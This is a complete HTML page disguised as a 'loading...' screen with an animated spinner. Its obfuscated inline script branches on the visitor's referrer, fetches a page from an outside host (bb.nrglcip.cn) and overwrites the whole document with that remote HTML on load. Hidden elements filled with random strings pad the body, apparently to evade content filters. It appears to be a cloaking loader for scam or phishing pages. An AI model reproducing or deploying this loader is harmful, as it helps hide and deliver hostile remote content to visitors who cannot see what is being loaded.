<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .YzsHGtAW {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .YzsHGtAW .BccxupH0qmA {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .YzsHGtAW .content {
            line-height: 50px;
            text-align: center
        }

        .YzsHGtAW .img {
            width: 100%
        }

        .YzsHGtAW .ujnISocJaYa {
            text-align: center
        }

        .YzsHGtAW .ujnISocJaYa span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .YzsHGtAW .ujnISocJaYa span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .YzsHGtAW .ujnISocJaYa span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .YzsHGtAW .ujnISocJaYa span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .YzsHGtAW .ujnISocJaYa span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .YzsHGtAW .ujnISocJaYa span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .YzsHGtAW .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function dhVK9Vvzt(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var E3anGn = dhVK9Vvzt('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ E3anGn +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ E3anGn +".html?a=share";
		}
		
        bsspPVu5E=url+"#"+new Date().getTime();
        bsspPVu5E && function() {
            $.get(bsspPVu5E, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<p  style='display:none'>wPiYjG2LAudEZYRy8kHpT3Je76vRupi0Ypw1PmBbINo6F86r8tDUVa0MO1i3nKF2IiIZc</p>
<p  style='display:none'>wPiYjG2LAudEZYRy8kHpT3Je76vRupi0Ypw1PmBbINo6F86r8tDUVa0MO1i3nKF2IiIZc</p>
<ul style='display:none' >kmetS6TRUvnBZSwyaZkDn7JY4D9KnBKRK9rndLGIEeIPrv28Ca9cbHVCjmRMzp7</ul>
<h1 style='display:none' >THb2ZoI0tjeA4pEL8Uy6y9PLuRQZH</h1><div class="YzsHGtAW">
    <div class="BccxupH0qmA">
        <div class="ujnISocJaYa">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >EcJGLGuV4iKJ5AyYrZY0i</h1>
<b style='display:none' >q8XbLVS4z90W8LAn2Qn9R82vKQ8rDQtFCSHtbU6rlqZYi2Xhp2aoS1kLqQ0KGXi1t72nWKTJY9cyekup8dGqUdotjeZizQrva</b>
<b style='display:none' >q8XbLVS4z90W8LAn2Qn9R82vKQ8rDQtFCSHtbU6rlqZYi2Xhp2aoS1kLqQ0KGXi1t72nWKTJY9cyekup8dGqUdotjeZizQrva</b>
<li style='display:none' >VBVPHAIfnRXSAjBB26huduHM2jhkaVI</li>
<li style='display:none' >VBVPHAIfnRXSAjBB26huduHM2jhkaVI</li>
<img  src='' style='display:none'>
<h1 style='display:none' >EcJGLGuV4iKJ5AyYrZY0i</h1></body>
</html>